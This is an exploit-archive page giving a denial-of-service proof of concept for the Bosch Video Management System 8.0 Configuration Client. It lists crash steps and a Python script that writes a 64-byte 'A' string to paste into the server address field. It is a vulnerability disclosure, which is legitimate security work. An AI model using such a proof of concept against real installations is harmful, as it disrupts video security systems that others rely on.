Bosch Video Management System 8.0 - Configuration Client Denial of Service (PoC)
|
来源:vfocus.net 作者:Daniel 发布时间:2018-11-15
|
|
# Exploit Title: Bosch Video Management System 8.0-Configuration Client-Denial of Service (Poc) # Discovery by: Daniel # Discovery Date: 2018-11-12 # Software Name: Bosch Video Management System # Software Version: 8.0 # Vendor Homepage: https://www.boschsecurity.com/xc/en/products/management-software/bvms/ # Software Link: https://la.boschsecurity.com/es/productos/videosystems_1/videosoftware_1/videomanagementsystems_1/boschvideomanagementsyste_8/boschvideomanagementsyste_8_44761 # Tested on: Windows 10 Pro x64 #Make sure that during the installation of software you installed all the program features available. #This PoC was carried out in 'Configuration Client', which is part of 'Bosch Video Management System'. # Steps to produce the crash: # 1.- run: dos.py # 2.- Open bosch.txt and copy content to clipboard # 2.- Open Configuration Client (Normally the installer creates a direct link in desktop) # 3.- Click on 'Connection:' box and select "Address Book" # 4.- Copy clipboard in "(Enterprise) Management Server Address:" # 5.- write "test" in 'Username' # 6.- Write "test" in 'Password' # 7.- Click on 'OK' # 8.- Crash #!/usr/bin/python buf = "\x41" * 64 f = open('bosch.txt', 'w') f.write(buf) f.close()
|
|
|
[推荐]
[评论(0条)]
[返回顶部] [打印本页]
[关闭窗口] |
|
|